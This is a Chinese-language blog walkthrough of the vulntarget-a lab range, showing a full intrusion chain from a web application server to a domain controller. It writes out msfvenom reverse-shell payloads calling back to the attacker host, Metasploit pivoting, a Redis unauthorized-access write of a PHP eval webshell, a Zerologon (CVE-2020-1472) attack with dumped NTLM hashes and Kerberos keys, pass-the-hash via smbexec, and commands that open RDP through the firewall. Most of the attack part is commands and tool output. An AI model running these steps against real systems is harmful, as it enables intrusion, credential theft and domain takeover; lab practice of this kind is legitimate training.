【靶场实战】vulntarget-a漏洞靶场实战

免责申明

本公众号的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

靶场介绍

vulntarget-a漏洞靶场是由vulntarget大佬团队自己设计搭建的靶场,其中涵盖Web漏洞、主机漏洞、域漏洞、工控漏洞等等。

靶场拓扑

以上拓扑图仅做参考,实战中的地址为以下配置:

kali攻击机:192.168.52.128

win11攻击机:192.168.52.1

win7应用服务器:192.168.52.129,10.0.20.98

win16域成员服务器:10.0.20.99,10.0.10.111

win19域控服务器:10.0.10.110

靶场实战

如需要自己搭建设计可以参考:http://mp.weixin.qq.com/s?__biz=Mzg3NDYwNjQyMw==&mid=2247486312&idx=1&sn=1bd4a6edcd6bc0133215d2fb79abe53b&chksm=cecf7150f9b8f846820c14ff5df467afe67e913b8592715bf7bf76cb011c407df6ead15819d3&scene=21#wechat_redirect

通达漏洞拿下应用服务

思路:主要通过通达OA漏洞拿下应用服务器,也可以通过永恒之蓝漏洞拿到服务器权限,思路差不多
本实战直接采用vulntarget大佬提供的靶场环境。搭建完成服务器后通过扫描win7地址开发端口服务:

服务器开放了80端口,访问后通过判断是通达OA,直接利用工具进行测试

得到shell后直接用蚁剑或者哥斯拉连接

执行命令查看当前网卡,当前为双网卡
ipconfig,如果出现乱码,可以在基本配置中设置编码格式为GB2312

转为CS和MSF上线

为了方便管理会话和后渗透的攻击,建议将会话转移到CS和MSF上

CS上线

上传CS木马到目标服务器

执行木马,获取cs会话

MSF上线

靶场设计第二层是通过redis上线,利用kali工具进行测试

生成反向木马
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.128 LPORT=5555 -f exe > /root/msfshell/5555.exe

使用msf监听

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options 

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LhOST 192.168.52.128
LhOST => 192.168.52.128
msf6 exploit(multi/handler) > set LPORT 
LPORT => 4444
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options 

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.52.128   yes       The listen address (an interface may be specified)
   LPORT     5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.52.128:5555 
[*] Sending stage (201798 bytes) to 192.168.52.129
[*] Meterpreter session 1 opened (192.168.52.128:5555 -> 192.168.52.129:51972) at 2024-06-18 16:55:10 +0800


在应用服务器win7上利用哥斯拉执行木马,获取msf会话成功
添加路由,设置代理,arp获取到内网同网段IP

meterpreter > run post/multi/manage/autoroute 

[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.52.0/255.255.255.0 from host's routing table.
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.20.0          255.255.255.0      Session 20
   192.168.52.0       255.255.255.0      Session 20

添加路由成功后,使用socks_proxy开启一个socks代理服务

msf6 auxiliary(server/socks_proxy) > options 

Module options (auxiliary/server/socks_proxy):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface
                                       to listen on. This must be an addres
                                       s on the local machine or 0.0.0.0 to
                                        listen on all addresses.
   SRVPORT  2222             yes       The port to listen on
   VERSION  5                yes       The SOCKS version to use (Accepted:
                                       4a, 5)


   When VERSION is 5:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   USERNAME                   no        Proxy username for SOCKS5 listener


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server



View the full module info with the info, or info -d command.

msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.

[*] Starting the SOCKS proxy server

开启socks代理后需要使用proxychains4,使用前需要配置一下proxychains4
sudo vim /etc/proxychains4.conf

shell命令中使用arp -a查看除了192.168.52.0/24段的地址

发现10.0.20.99地址,利用nmap扫描10.0.20.99,因为只是常用端口扫描,就没有扫描到6379端口
sudo proxychains4 nmap -sT -Pn 10.0.20.99

可以直接扫描redis端口,扫描的时候需要使用root权限,要不然扫描到的状态是过滤
sudo proxychains4 nmap -sT -p 6379 -Pn 10.0.20.99

redis未授权获取服务权限

利用redis未授权以及php web环境来getshell
redis未授权漏洞写webshell

└─$ sudo proxychains4 redis-cli -h 10.0.20.99                                                                          
[sudo] kali 的密码:
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  192.168.52.128:2222  ...  10.0.20.99:6379  ...  OK
10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW/"
OK
10.0.20.99:6379> config set dbfilename tx.php
OK
10.0.20.99:6379> set 1 "<?php @eval($_POST['tx']);?>"
OK
10.0.20.99:6379> save
OK
10.0.20.99:6379> 

写入shell成功后,利用哥斯拉或者蚁剑连接
利用蚁剑连接,先配置代理


我这边直接尝试反向连接,生成反向木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.20.98 LPORT=5555 -f exe -o 123.exe
上传到第二层目标服务器win2016服务上执行
在kali上利用msf监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.20.98
set LPORT 5555
options


执行后就可以获取msf会话

进入shell后执行ipconfig查看网卡
发现10.0.10.111地址
当前权限是administrator权限

拿下域控服务win2019

探测域控服务

meterpreter > run post/windows/gather/enum_domain

[+] Domain FQDN: vulntarget.com
[+] Domain NetBIOS Name: VULNTARGET
[+] Domain Controller: win2019.vulntarget.com (IP: 10.0.10.110)

得到域控IP:10.0.10.110

账号:WIN-UKFQSV1OMUB

域:balsec.com

再次添加路由:
run post/multi/manage/autoroute

查看当前路由信息

测试下是否能够扫描域控主机10.0.10.110,利用nmap扫描

直接域内提权

对域控进行测试漏洞是否存在

sudo proxychains4 python3 zerologon_tester.py win2019 10.0.10.110

出现success,证明漏洞存在

直接利用exp进行攻击

使用zerologon工具将域控密码打成空

(这里打空的用户是域控所在机器的账户,并不是域控账户。)

sudo proxychains4 python3 cve-2020-1472-exploit.py win2019 10.0.10.110

获取域控hash,cd到example下:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:839b6abacd6c6bdd814f0ba6fb0f94f9:::
WIN-UKFQSV1OMUB$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-CHSI558JDRS$:1103:aad3b435b51404eeaad3b435b51404ee:e66191ef715d73ff91be074777d3ed02:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:ecb89a4e91cccc9c7fc032d25baacac6d86068c030f617185a52854eb796c920
Administrator:aes128-cts-hmac-sha1-96:d3b5696e566bca57ffdfd57576068c63
Administrator:des-cbc-md5:322a836da886d39d
krbtgt:aes256-cts-hmac-sha1-96:4d1befebb0d088a69c01f5a4045b3ce78b061d61c273cc7e5f38ca54eec9538d
krbtgt:aes128-cts-hmac-sha1-96:4117fc904715b252b8bed058315068b1
krbtgt:des-cbc-md5:7a45ad015d2cba86
WIN-UKFQSV1OMUB$:aes256-cts-hmac-sha1-96:f03227a5a0d4203943c8e63070692aafbf93f475afc4310dba3350bd4736d59a
WIN-UKFQSV1OMUB$:aes128-cts-hmac-sha1-96:f0f2c8151d89eff91e9d76f412ca54d1
WIN-UKFQSV1OMUB$:des-cbc-md5:f4f8193dc80b4ce0
WIN-CHSI558JDRS$:aes256-cts-hmac-sha1-96:ef70a9041487fef2f7fa4dd91724545ed5286d70242495370b92393de45cb971
WIN-CHSI558JDRS$:aes128-cts-hmac-sha1-96:2157ac92157cde35268a54568a834333
WIN-CHSI558JDRS$:des-cbc-md5:ef8a9449a2b64c37
[*] Cleaning up...

直接就拿下域控
proxychains4 python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
开启3389远程桌面

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

直接3389登录:proxychains4 rdesktop 10.0.10.110

账号:balsec.com\administrator 密码:Admin@666

关注公众号

posted @ 2024-06-19 13:22  小C学安全  阅读(319)  评论(0编辑  收藏  举报